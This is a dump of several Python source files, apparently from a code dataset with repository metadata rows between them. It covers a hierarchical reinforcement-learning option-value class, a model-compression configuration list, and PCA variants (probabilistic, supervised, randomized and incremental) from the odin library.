self.initial_theta = 1 / env.n_basic_actions
self.theta = np.full([self.n_options, env.n_basic_actions, env.n_basic_actions], np.nan) # option x act x feat
def create_option(self, event, env, v):
action_level = event[0] - 1
option_level = event[0]
option_position = event[1]
caller_level = event[0] + 1
# Fill up theta table of newly-encountered option
if action_level >= 0: # only for options (i.e., action level exists)
n_features = env.n_options_per_level[action_level]
discovered_actions = np.argwhere(~np.isnan(v[action_level]))
option_index = self.option_coord_to_index(event)
self.theta[option_index, discovered_actions, 0:n_features] = self.initial_theta
# Add newly-encountered option to all caller options that could use it
if option_level > 0 and caller_level < env.n_levels: # only for options based on options
caller_options = np.argwhere(~np.isnan(v[caller_level]))
if len(caller_options) > 0:
for caller in caller_options:
caller_index = self.option_coord_to_index([caller_level, caller])
n_options = env.n_options_per_level[option_level]
self.theta[caller_index, option_position, 0:n_options] = self.initial_theta
def update(self, agent, hist, current_option, goal_achieved, state_before, state_after):
action_level = current_option[0] - 1
actions = hist.event_s[:, action_level]
action = int(actions[~np.isnan(actions)][-1])
values_before = agent.v.get_option_values(state_before, current_option, agent.theta)
v_before = values_before[action_level, action]
if not goal_achieved:
values_after = agent.v.get_option_values(state_after, current_option, agent.theta)
v_after = max(values_after[action_level, :]) # maxQ
else:
v_after = 0
delta = goal_achieved + agent.gamma * v_after - v_before
if np.isnan(delta):
delta = 0
self.theta[self.option_coord_to_index(current_option), action, state_before[action_level]] += agent.alpha * delta
def get_option_thetas(self, option, action=None):
if action is None:
return self.theta[self.option_coord_to_index(option), :, :].copy() # [option, action, feature]
else:
return self.theta[self.option_coord_to_index(option), action, :].copy()
@staticmethod
def __get_coord_function(env):
def option_coord_to_index(coord):
level, option = coord
if level == 0:
index = np.nan
else:
index = int(np.sum(env.n_options_per_level[1:level]) + option)
return index
return option_coord_to_index
def get(self):
return self.theta.copy()
| [
"maria.eckstein@berkeley.edu"
] | maria.eckstein@berkeley.edu |
fa89a5fb1be8f156007579c36360fd730af3e208 | 09ac3f6e1b5df18240d3d0a91d6e4e628896259a | /configurations.py | a1a3898da815500095dbf1bcd18057bb5a462d10 | [] | no_license | mowayao/modelcompression-2019 | def75b8f41c206d97094d878075ff059c954622c | 0f893850b6ec32b79bbd4817592d86ef27a5bad4 | refs/heads/master | 2020-08-11T20:14:39.885510 | 2019-06-29T12:11:56 | 2019-06-29T12:11:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,786 | py | from cifar_classifier import MaskedCifar
from mnist_classifier import MaskedMNist
from bayesian.MNIstDropout import MaskedConcreteMNist
from resnet import MaskedResNet18
from yolov3 import MaskedDarknet, YoloWrapper
from classifier import Classifier
from torchvision import datasets, transforms
from fasterrcnn.resnet import MaskedFasterRCNN
import torch.nn.functional as F
import torch.optim as optim
configurations = [
{
'name': 'FCCifar10Classifier',
'type': 'classifier',
'model': MaskedCifar,
'wrapper': Classifier,
'dataset': datasets.CIFAR10,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
],
'loss_fn': F.cross_entropy,
'optimizer': optim.SGD
},
{
'name': 'BayesMNistClassifier',
'type': 'classifier',
'model': MaskedConcreteMNist,
'wrapper': Classifier,
'dataset': datasets.MNIST,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
],
'loss_fn': F.nll_loss,
'optimizer': optim.SGD
},
{
'name': 'MNistClassifier',
'type': 'classifier',
'model': MaskedMNist,
'wrapper': Classifier,
'dataset': datasets.MNIST,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
],
'loss_fn': F.nll_loss,
'optimizer': optim.SGD
},
{
'name': 'ResNet18CifarClassifier',
'type': 'classifier',
'model': MaskedResNet18,
'wrapper': Classifier,
'dataset': datasets.CIFAR10,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
],
'loss_fn': F.cross_entropy,
'optimizer': optim.SGD
},
{
'name': 'YOLOv3',
'type': 'yolo',
'model': MaskedDarknet,
'wrapper': YoloWrapper,
'config_path': './yolo.cfg',
'image_size': 416,
'datasets': {
'train': 'D:\data\coco2014\\train.txt',
'test': 'D:\data\coco2014\\test.txt',
'val': 'D:\data\coco2014\\train.txt',
},
'optimizer': optim.SGD
},
{
'name': 'FasterRCNN',
'type': 'frcnn',
'model': MaskedFasterRCNN,
'wrapper': Classifier,
'image_width': 335,
'image_height': 500,
'optimizer': optim.SGD
}
] | [
"ahraz.asif1994@gmail.com"
] | ahraz.asif1994@gmail.com |
fabb95158bf9293648bb55e33f5ef64f8969617f | ea767918d1391d950714d3fafabf65330bade863 | /odin/ml/decompositions.py | c59b06782744c6e34dd9d4d63821bd457fc56d8f | [
"MIT"
] | permissive | tirkarthi/odin-ai | f5bb33d02047025029891e1282b9bd389eb4eb07 | 7900bef82ad8801d0c73880330d5b24d9ff7cd06 | refs/heads/master | 2023-06-02T20:15:11.233665 | 2020-09-25T09:57:28 | 2020-09-25T09:57:28 | 298,744,248 | 0 | 0 | MIT | 2020-09-26T05:29:11 | 2020-09-26T05:29:10 | null | UTF-8 | Python | false | false | 40,980 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import math
from multiprocessing import Array, Value
from numbers import Number
import numpy as np
from scipy import linalg
from six import string_types
from sklearn.decomposition import PCA, IncrementalPCA
from sklearn.utils import (as_float_array, check_array, check_random_state,
gen_batches)
from sklearn.utils.extmath import (_incremental_mean_and_var, randomized_svd,
svd_flip)
from sklearn.utils.validation import check_is_fitted
from odin.ml.base import BaseEstimator, TransformerMixin
from odin.utils import Progbar, batching, ctext, flatten_list
from odin.utils.mpi import MPI
__all__ = [
"fast_pca",
"MiniBatchPCA",
"PPCA",
"SupervisedPPCA",
]
def fast_pca(*x,
n_components=None,
algo='pca',
y=None,
batch_size=1024,
return_model=False,
random_state=1234):
r""" A shortcut for many different PCA algorithms
Arguments:
x : {list, tuple}
list of matrices for transformation, the first matrix will
be used for training
n_components : {None, int}
number of PCA components
algo : {'pca', 'ipca', 'ppca', 'sppca', 'plda', 'rpca'}
different PCA algorithm:
'ipca' - IncrementalPCA,
'ppca' - Probabilistic PCA,
'sppca' - Supervised Probabilistic PCA,
'plda' - Probabilistic LDA,
'rpca' - randomized PCA using randomized SVD
'pca' - Normal PCA
y : {numpy.ndarray, None}
required for labels in case of `sppca`
batch_size : int (default: 1024)
batch size, only used for IncrementalPCA
return_model : bool (default: False)
if True, return the trained PCA model as the FIRST return
"""
try:
from cuml.decomposition import PCA as cuPCA
except ImportError:
cuPCA = None
batch_size = int(batch_size)
algo = str(algo).lower()
if algo not in ('pca', 'ipca', 'ppca', 'sppca', 'plda', 'rpca'):
raise ValueError("`algo` must be one of the following: 'pca', "
"'ppca', 'plda', 'sppca', or 'rpca'; but given: '%s'" %
algo)
if algo in ('sppca', 'plda') and y is None:
raise RuntimeError("`y` must be not None if `algo='sppca'`")
x = flatten_list(x, level=None)
# ====== check input ====== #
x_train = x[0]
x_test = x[1:]
input_shape = None
if x_train.ndim > 2: # only 2D for PCA
input_shape = (-1,) + x_train.shape[1:]
new_shape = (-1, np.prod(input_shape[1:]))
x_train = np.reshape(x_train, new_shape)
x_test = [np.reshape(x, new_shape) for x in x_test]
if n_components is not None: # no need to reshape back
input_shape = None
# ====== train PCA ====== #
if algo == 'sppca':
pca = SupervisedPPCA(n_components=n_components, random_state=random_state)
pca.fit(x_train, y)
elif algo == 'plda':
from odin.ml import PLDA
pca = PLDA(n_phi=n_components, random_state=random_state)
pca.fit(x_train, y)
elif algo == 'pca':
if x_train.shape[1] > 1000 and x_train.shape[0] > 1e5 and cuPCA is not None:
pca = cuPCA(n_components=n_components, random_state=random_state)
else:
pca = PCA(n_components=n_components, random_state=random_state)
pca.fit(x_train)
elif algo == 'rpca':
# we copy the implementation of RandomizedPCA because
# it is significantly faster than PCA(svd_solver='randomize')
pca = RandomizedPCA(n_components=n_components,
iterated_power=2,
random_state=random_state)
pca.fit(x_train)
elif algo == 'ipca':
pca = IncrementalPCA(n_components=n_components, batch_size=batch_size)
prog = Progbar(target=x_train.shape[0],
print_report=False,
print_summary=False,
name="Fitting PCA")
for start, end in batching(batch_size=batch_size,
n=x_train.shape[0],
seed=1234):
pca.partial_fit(x_train[start:end], check_input=False)
prog.add(end - start)
elif algo == 'ppca':
pca = PPCA(n_components=n_components, random_state=random_state)
pca.fit(x_train)
# ====== transform ====== #
x_train = pca.transform(x_train)
x_test = [pca.transform(x) for x in x_test]
# reshape back to original shape if necessary
if input_shape is not None:
x_train = np.reshape(x_train, input_shape)
x_test = [np.reshape(x, input_shape) for x in x_test]
# return the results
if len(x_test) == 0:
return x_train if not return_model else (pca, x_train)
return tuple([x_train] +
x_test) if not return_model else tuple([pca, x_train] + x_test)
# ===========================================================================
# PPCA
# ===========================================================================
class PPCA(BaseEstimator, TransformerMixin):
""" Probabilistic Principal Components Analysis
(C) Copyright University of Eastern Finland (UEF).
Ville Vestman, ville.vestman@uef.fi,
Tomi Kinnunen, tkinnu@cs.uef.fi.
Parameters
----------
n_components : {int, None}
if None, keep the same dimensions as input features
bias : {vector, 'auto'} [feat_dim,]
if 'auto' take mean of training data
n_iter : {integer, 'auto'}
if 'auto', keep iterating until no more improvement (i.e. reduction in `sigma` value)
compared to the `improve_threshold`
improve_threshold : scalar
Only used in case `n_iter='auto'`
solver : {'traditional', 'simple'}
verbose: {0, 1}
showing logging information during fitting
random_state : {None, integer, numpy.random.RandomState}
Attributes
----------
V_ : [feat_dim, n_components]
total variability matrix
bias_ : [feat_dim]
bias vector
sigma_ : scalar
variance of error term
References
----------
[1] Ville Vestman and Tomi Kinnunen, "Supervector Compression
Strategies to Speed up i-vector System Development",
submitted to Speaker Odyssey 2018.
"""
def __init__(self,
n_components=None,
bias='auto',
n_iter='auto',
improve_threshold=1e-3,
solver='traditional',
verbose=0,
random_state=None):
super(PPCA, self).__init__()
if isinstance(n_components, Number):
assert n_components > 0, \
"`n_components` must be greater than 0, but given: %d" % n_components
n_components = int(n_components)
elif n_components is not None:
raise ValueError("`n_components` can be None or integer")
self.n_components_ = n_components
# ====== checking bias ====== #
if isinstance(bias, string_types):
bias = bias.strip().lower()
assert bias == 'auto', 'Invalid value for `bias`: %s' % bias
elif not isinstance(bias, (np.ndarray, Number)):
raise ValueError("`bias` can be 'auto', numpy.ndarray or a number")
self.bias_ = bias
# ====== checking solver ====== #
if solver not in ('traditional', 'simple'):
raise ValueError("`solver` must be: 'traditional', or 'simple'")
self.solver_ = solver
# ====== checking n_iter ====== #
if isinstance(n_iter, string_types):
n_iter = n_iter.lower()
assert n_iter == 'auto', 'Invalid `n_iter` value: %s' % n_iter
elif isinstance(n_iter, Number):
assert n_iter > 0, "`n_iter` must greater than 0, but given: %d" % n_iter
self.n_iter_ = n_iter
# ====== checking random_state ====== #
if random_state is None:
rand = np.random.RandomState(seed=None)
elif isinstance(random_state, Number):
rand = np.random.RandomState(seed=None)
elif isinstance(random_state, np.random.RandomState):
rand = random_state
else:
raise ValueError("No suppport for `random_state` value: %s" %
str(random_state))
self.random_state_ = rand
# ====== other dimension ====== #
self.improve_threshold_ = float(improve_threshold)
self.feat_dim_ = None
self.verbose_ = int(verbose)
def fit(self, X, y=None):
# ====== initialize ====== #
num_samples, feat_dim = X.shape
n_components = feat_dim if self.n_components_ is None else self.n_components_
if self.bias_ == 'auto':
bias = np.mean(X, 0)
elif isinstance(self.bias_, Number):
bias = np.full(shape=(feat_dim,), fill_value=self.bias_)
else:
bias = self.bias_
assert bias.shape == (feat_dim,), \
"Invialid `bias` given shape: %s, require shape: %s" % (str(bias.shape), str((feat_dim,)))
# ====== initialize parameters ====== #
V = self.random_state_.rand(feat_dim, n_components)
last_sigma = None
sigma = 1
centeredM = X - bias[np.newaxis, :]
varianceM = np.sum(centeredM**2) / (num_samples * feat_dim)
# ====== training ====== #
if self.verbose_:
print(
'[PPCA]n_components: %d n_sample: %d feat_dim: %d n_iter: %d threshold: %f solver: %s'
% (n_components, num_samples, feat_dim, -1 if self.n_iter_ == 'auto'
else self.n_iter_, self.improve_threshold_, self.solver_))
curr_n_iter = 0
while True:
B = (V * 1 / sigma).T # [feat_dim, n_components]
Sigma = np.linalg.inv(np.eye(n_components) +
np.dot(B, V)) # [n_components, n_components]
my = np.dot(np.dot(Sigma, B), centeredM.T) # [n_components, num_samples]
if self.solver_ == 'traditional':
sumEmm = num_samples * Sigma + np.dot(my, my.T)
elif self.solver_ == 'simple':
sumEmm = np.dot(my, my.T)
sumEmmInv = np.linalg.inv(sumEmm) # [n_components, n_components]
# updating V and sigma for next iteration
V = np.dot(np.dot(centeredM.T, my.T),
sumEmmInv) # [feat_dim, n_components]
last_sigma = sigma
sigma = varianceM - np.sum(
sumEmm * np.dot(V.T, V)) / (feat_dim * num_samples)
improvement = last_sigma - sigma
# log
if self.verbose_ > 0:
print("Iteration: %d sigma: %.3f improvement: %.3f" %
(curr_n_iter, sigma, improvement))
# check iteration escape
curr_n_iter += 1
if isinstance(self.n_iter_, Number):
if curr_n_iter >= self.n_iter_:
break
elif curr_n_iter > 1 and improvement < self.improve_threshold_:
break
# ====== save the model ====== #
# record new dimensions
self.feat_dim_ = feat_dim
self.n_components_ = n_components
# trained vectors and matrices
self.V_ = V
self.bias_ = bias
self.sigma_ = sigma
# pre-calculate matrix for transform
B = (V * 1 / sigma).T
Sigma = np.linalg.inv(np.eye(n_components) + np.dot(B, V))
self.extractorMatrix_ = np.dot(Sigma, B) # [n_components, feat_dim]
def transform(self, X):
"""
Parameters
----------
X : matrix [num_samples, feat_dim]
"""
assert hasattr(self, 'extractorMatrix_'), "The model hasn't `fit` on data"
assert X.shape[1] == self.feat_dim_, \
"Expect input matrix with shape: [?, %d], but give: %s" % (self.feat_dim_, str(X.shape))
ivec = np.dot(self.extractorMatrix_, (X - self.bias_[np.newaxis, :]).T)
return ivec.T
class SupervisedPPCA(PPCA):
""" Supervised Probabilistic Principal Components Analysis
(C) Copyright University of Eastern Finland (UEF).
Ville Vestman, ville.vestman@uef.fi,
Tomi Kinnunen, tkinnu@cs.uef.fi.
Parameters
----------
n_components : {int, None}
if None, keep the same dimensions as input features
bias : {vector, 'auto'} [feat_dim,]
if 'auto' take mean of training data
beta : scalar (default: 1)
a weight parameter (use beta = 1 as default)
n_iter : {integer, 'auto'}
if 'auto', keep iterating until no more improvement (i.e. reduction in `sigma` value)
compared to the `improve_threshold`
improve_threshold : scalar
Only used in case `n_iter='auto'`
solver : {'traditional', 'simple'}
extractor : {'supervised', 'unsupervised'}
'supervised' is the probabilistic partial least squares extractor using
both unsupervised and supervised information
verbose: {0, 1}
showing logging information during fitting
random_state : {None, integer, numpy.random.RandomState}
Attributes
----------
V_ : [feat_dim, n_components]
total variability matrix
Q_ : [feat_dim, n_components]
matrix for mapping speaker-dependent supervectors to i-vectors
sigma_ : scalar
variance of error term
rho_ : scalar
variance of error term in speaker-dependent supervector model
bias_ : [feat_dim,]
bias vector
classBias_ : [feat_dim,]
mean of speaker-dependent supervectors
"""
def __init__(self,
n_components=None,
bias='auto',
beta=1,
n_iter='auto',
improve_threshold=1e-3,
solver='traditional',
extractor='supervised',
verbose=0,
random_state=None):
super(SupervisedPPCA, self).__init__(n_components=n_components,
bias=bias,
n_iter=n_iter,
solver=solver,
improve_threshold=improve_threshold,
verbose=verbose,
random_state=random_state)
self.beta_ = float(beta)
# ====== check extractor ====== #
extractor = str(extractor).lower()
if extractor not in ('supervised', 'unsupervised'):
raise ValueError(
"`extractor` can only be: 'unsupervised' or 'supervised'")
self.extractor_ = extractor
def fit(self, X, y, z=None):
"""
Parameters
----------
X : matrix [num_samples, feat_dim]
y : vector (int) [num_samples,]
z : matrix [num_classes, feat_dim]
class-dependent feature vectors for each class from 0 to `num_classes - 1`
(in this order).
"""
# ====== initialize ====== #
num_samples, feat_dim = X.shape
num_classes = z.shape[0] if z is not None else len(np.unique(y))
n_components = feat_dim if self.n_components_ is None else self.n_components_
if self.bias_ == 'auto':
bias = np.mean(X, 0)
elif isinstance(self.bias_, Number):
bias = np.full(shape=(feat_dim,), fill_value=self.bias_)
else:
bias = self.bias_
assert bias.shape == (feat_dim,), \
"Invialid `bias` given shape: %s, require shape: %s" % (str(bias.shape), str((feat_dim,)))
# checking `y`
y = y.ravel().astype('int32')
assert y.shape[0] == num_samples, \
"Number of samples incosistent in `X`(%s) and `y`(%s)" % (str(X.shape), str(y.shape))
# checking `z`
if z is None:
z = np.empty(shape=(max(np.max(y) + 1, num_classes), feat_dim),
dtype=X.dtype)
for i in np.unique(y):
z[i, :] = np.mean(X[y == i], axis=0, keepdims=True)
else:
assert z.shape[0] == num_classes
assert z.shape[1] == feat_dim
# ====== initialize parameters ====== #
V = self.random_state_.rand(feat_dim, n_components)
Q = self.random_state_.rand(feat_dim, n_components)
last_sigma = None
sigma = 1
last_rho = None
rho = 1
centeredM = X - bias[np.newaxis, :]
varianceM = np.sum(centeredM**2) / (num_samples * feat_dim)
centeredY = z[y]
classBias = np.mean(centeredY, 0)
centeredY = centeredY - classBias[np.newaxis, :]
varianceY = np.sum(centeredY**2) / (num_samples * feat_dim)
# ====== training ====== #
if self.verbose_:
print(
'[S-PPCA]n_components: %d n_sample: %d feat_dim: %d n_iter: %d threshold: %f solver: %s'
% (n_components, num_samples, feat_dim, -1 if self.n_iter_ == 'auto'
else self.n_iter_, self.improve_threshold_, self.solver_))
curr_n_iter = 0
while True:
B = (V * 1 / sigma).T # [feat_dim, n_components]
C = (Q * self.beta_ * 1 / rho).T # [feat_dim, n_components]
Sigma = np.linalg.inv(np.eye(n_components) + np.dot(B, V) +
np.dot(C, Q)) # [n_components, n_components]
# [n_components, num_samples]
my = np.dot(Sigma, np.dot(B, centeredM.T) + np.dot(C, centeredY.T))
if self.solver_ == 'traditional':
sumEmm = num_samples * Sigma + np.dot(my, my.T)
elif self.solver_ == 'simple':
sumEmm = np.dot(my, my.T)
sumEmmInv = np.linalg.inv(sumEmm) # [n_components, n_components]
# updating V and sigma for next iteration
V = np.dot(np.dot(centeredM.T, my.T),
sumEmmInv) # [feat_dim, n_components]
Q = np.dot(np.dot(centeredY.T, my.T),
sumEmmInv) # [feat_dim, n_components]
last_sigma = sigma
sigma = varianceM - np.sum(
sumEmm * np.dot(V.T, V)) / (feat_dim * num_samples)
improvement_sigma = last_sigma - sigma
last_rho = rho
rho = varianceY - np.sum(
sumEmm * np.dot(Q.T, Q)) / (feat_dim * num_samples)
improvement_rho = last_rho - rho
# log
if self.verbose_ > 0:
print(
"Iteration: %d sigma: %.3f rho: %.3f improvement: %.3f:%.3f"
% (curr_n_iter, sigma, rho, improvement_sigma, improvement_rho))
# check iteration escape
curr_n_iter += 1
if isinstance(self.n_iter_, Number):
if curr_n_iter >= self.n_iter_:
break
elif curr_n_iter > 1 and \
improvement_sigma < self.improve_threshold_ and \
improvement_rho < self.improve_threshold_:
break
# ====== save the model ====== #
# record new dimensions
self.feat_dim_ = feat_dim
self.n_components_ = n_components
self.num_classes_ = num_classes
# trained vectors and matrices
self.V_ = V
self.Q_ = Q
self.bias_ = bias
self.classBias_ = classBias
self.sigma_ = sigma
self.rho_ = rho
# pre-calculate matrix for PPCA transform
B = (V * 1 / sigma).T
Sigma = np.linalg.inv(np.eye(n_components) + np.dot(B, V))
self.extractorMatrix_ = np.dot(Sigma, B) # [n_components, feat_dim]
# pre-calculate matrix for PPLS transform
A = np.concatenate([V, Q], axis=0) # [2 * feat_dim, n_components]
B = np.concatenate([(V * 1 / sigma).T, (Q * 1 / rho).T],
axis=-1) # [n_components, 2 * feat_dim]
sigmaW = np.linalg.inv(np.eye(n_components) +
np.dot(B, A)) # [n_components, n_components]
self.extractorMatrixPPLS_ = np.dot(sigmaW,
B) # [n_components, 2 * feat_dim]
C = np.dot(V.T,
V) + sigma * np.eye(n_components) # [n_components, n_components]
self.labelMatrix_ = np.dot(Q, np.linalg.solve(C,
V.T)) # [feat_dim, feat_dim]
def transform(self, X):
if self.extractor_ == 'unsupervised':
return super(SupervisedPPCA, self).transform(X)
else:
centeredM = X - self.bias_[np.newaxis, :]
labels = np.dot(self.labelMatrix_,
centeredM.T) + self.classBias_[:, np.newaxis]
ivec = np.dot(
self.extractorMatrixPPLS_,
np.concatenate([X.T, labels], axis=0) -
np.concatenate([self.bias_, self.classBias_])[:, np.newaxis])
return ivec.T
# ===========================================================================
# PCA
# ===========================================================================
class RandomizedPCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA) using randomized SVD
Linear dimensionality reduction using approximated Singular Value
Decomposition of the data and keeping only the most significant
singular vectors to project the data to a lower dimensional space.
Parameters
----------
n_components : int, optional
Maximum number of components to keep. When not given or None, this
is set to n_features (the second dimension of the training data).
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
iterated_power : int, default=2
Number of iterations for the power method.
whiten : bool, optional
When True (False by default) the `components_` vectors are multiplied
by the square root of (n_samples) and divided by the singular values to
ensure uncorrelated outputs with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making their data respect some hard-wired assumptions.
random_state : int, RandomState instance or None, optional, default=None
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
components_ : array, shape (n_components, n_features)
Components with maximum variance.
explained_variance_ratio_ : array, shape (n_components,)
Percentage of variance explained by each of the selected components.
If k is not set then all components are stored and the sum of explained
variances is equal to 1.0.
singular_values_ : array, shape (n_components,)
The singular values corresponding to each of the selected components.
The singular values are equal to the 2-norms of the ``n_components``
variables in the lower-dimensional space.
mean_ : array, shape (n_features,)
Per-feature empirical mean, estimated from the training set.
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import RandomizedPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = RandomizedPCA(n_components=2)
>>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
RandomizedPCA(copy=True, iterated_power=2, n_components=2,
random_state=None, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
>>> print(pca.singular_values_) # doctest: +ELLIPSIS
[ 6.30061... 0.54980...]
References
----------
.. [Halko2009] `Finding structure with randomness: Stochastic algorithms
for constructing approximate matrix decompositions Halko, et al., 2009
(arXiv:909)`
.. [MRT] `A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`
"""
def __init__(self,
n_components=None,
copy=True,
iterated_power=2,
whiten=False,
random_state=None):
self.n_components = n_components
self.copy = copy
self.iterated_power = iterated_power
self.whiten = whiten
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model with X by extracting the first principal components.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
y : Ignored.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(check_array(X))
return self
def _fit(self, X):
"""Fit the model to the data X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
X : ndarray, shape (n_samples, n_features)
The input data, copied, centered and whitened when requested.
"""
random_state = check_random_state(self.random_state)
X = np.atleast_2d(as_float_array(X, copy=self.copy))
n_samples = X.shape[0]
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U, S, V = randomized_svd(X,
n_components,
n_iter=self.iterated_power,
random_state=random_state)
self.explained_variance_ = exp_var = (S**2) / (n_samples - 1)
full_var = np.var(X, ddof=1, axis=0).sum()
self.explained_variance_ratio_ = exp_var / full_var
self.singular_values_ = S # Store the singular values.
if self.whiten:
self.components_ = V / S[:, np.newaxis] * math.sqrt(n_samples)
else:
self.components_ = V
return X
def transform(self, X):
"""Apply dimensionality reduction on X.
X is projected on the first principal components previous extracted
from a training set.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'mean_')
X = check_array(X)
if self.mean_ is not None:
X = X - self.mean_
X = np.dot(X, self.components_.T)
return X
def fit_transform(self, X, y=None):
"""Fit the model with X and apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
y : Ignored.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = check_array(X)
X = self._fit(X)
return np.dot(X, self.components_.T)
def inverse_transform(self, X):
"""Transform data back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples in the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation of transform.
"""
check_is_fitted(self, 'mean_')
X_original = np.dot(X, self.components_)
if self.mean_ is not None:
X_original = X_original + self.mean_
return X_original
class MiniBatchPCA(IncrementalPCA):
""" A modified version of IncrementalPCA to effectively
support multi-processing (but not work)
Original Author: Kyle Kastner <kastnerkyle@gmail.com>
Giorgio Patrini
License: BSD 3 clause
Incremental principal components analysis (IPCA).
Linear dimensionality reduction using Singular Value Decomposition of
centered data, keeping only the most significant singular vectors to
project the data to a lower dimensional space.
Depending on the size of the input data, this algorithm can be much more
memory efficient than a PCA.
This algorithm has constant memory complexity, on the order
of ``batch_size``, enabling use of np.memmap files without loading the
entire file into memory.
The computational overhead of each SVD is
``O(batch_size * n_features ** 2)``, but only 2 * batch_size samples
remain in memory at a time. There will be ``n_samples / batch_size`` SVD
computations to get the principal components, versus 1 large SVD of
complexity ``O(n_samples * n_features ** 2)`` for PCA.
Read more in the :ref:`User Guide <IncrementalPCA>`.
Parameters
----------
n_components : int or None, (default=None)
Number of components to keep. If ``n_components `` is ``None``,
then ``n_components`` is set to ``min(n_samples, n_features)``.
batch_size : int or None, (default=None)
The number of samples to use for each batch. Only used when calling
``fit``. If ``batch_size`` is ``None``, then ``batch_size``
is inferred from the data and set to ``5 * n_features``, to provide a
balance between approximation accuracy and memory consumption.
copy : bool, (default=True)
If False, X will be overwritten. ``copy=False`` can be used to
save memory but is unsafe for general use.
whiten : bool, optional
When True (False by default) the ``components_`` vectors are divided
by ``n_samples`` times ``components_`` to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometimes
improve the predictive accuracy of the downstream estimators by
making data respect some hard-wired assumptions.
Attributes
----------
components_ : array, shape (n_components, n_features)
Components with maximum variance.
explained_variance_ : array, shape (n_components,)
Variance explained by each of the selected components.
explained_variance_ratio_ : array, shape (n_components,)
Percentage of variance explained by each of the selected components.
If all components are stored, the sum of explained variances is equal
to 1.0
mean_ : array, shape (n_features,)
Per-feature empirical mean, aggregate over calls to ``partial_fit``.
var_ : array, shape (n_features,)
Per-feature empirical variance, aggregate over calls to
``partial_fit``.
noise_variance_ : float
The estimated noise covariance following the Probabilistic PCA model
from Tipping and Bishop 1999. See "Pattern Recognition and
Machine Learning" by C. Bishop, 12.2.1 p. 574 or
http://www.miketipping.com/papers/met-mppca.pdf.
n_components_ : int
The estimated number of components. Relevant when
``n_components=None``.
n_samples_seen_ : int
The number of samples processed by the estimator. Will be reset on
new calls to fit, but increments across ``partial_fit`` calls.
Notes
-----
Implements the incremental PCA model from:
`D. Ross, J. Lim, R. Lin, M. Yang, Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77, Issue 1-3,
pp. 125-141, May 2008.`
See http://www.cs.toronto.edu/~dross/ivt/RossLimLinYang_ijcv.pdf
This model is an extension of the Sequential Karhunen-Loeve Transform from:
`A. Levy and M. Lindenbaum, Sequential Karhunen-Loeve Basis Extraction and
its Application to Images, IEEE Transactions on Image Processing, Volume 9,
Number 8, pp. 1371-1374, August 2000.`
See http://www.cs.technion.ac.il/~mic/doc/skl-ip.pdf
We have specifically abstained from an optimization used by authors of both
papers, a QR decomposition used in specific situations to reduce the
algorithmic complexity of the SVD. The source for this technique is
`Matrix Computations, Third Edition, G. Holub and C. Van Loan, Chapter 5,
section 5.4.4, pp 252-253.`. This technique has been omitted because it is
advantageous only when decomposing a matrix with ``n_samples`` (rows)
>= 5/3 * ``n_features`` (columns), and hurts the readability of the
implemented algorithm. This would be a good opportunity for future
optimization, if it is deemed necessary.
For `multiprocessing`, you can do parallelized `partial_fit` or `transform`
but you cannot do `partial_fit` in one process and `transform` in the others.
Application
-----------
In detail, in order for PCA to work well, informally we require that
(i) The features have approximately zero mean, and
(ii) The different features have similar variances to each other.
With natural images, (ii) is already satisfied even without variance
normalization, and so we won’t perform any variance normalization.
(If you are training on audio data—say, on spectrograms—or on text data—say,
bag-of-word vectors—we will usually not perform variance normalization
either.)
By using PCA, we aim for:
(i) the features are less correlated with each other, and
(ii) the features all have the same variance.
Original link: http://ufldl.stanford.edu/tutorial/unsupervised/PCAWhitening/
References
----------
D. Ross, J. Lim, R. Lin, M. Yang. Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77,
Issue 1-3, pp. 125-141, May 2008.
G. Golub and C. Van Loan. Matrix Computations, Third Edition, Chapter 5,
Section 5.4.4, pp. 252-253.
See also
--------
PCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self,
n_components=None,
whiten=False,
copy=True,
batch_size=None):
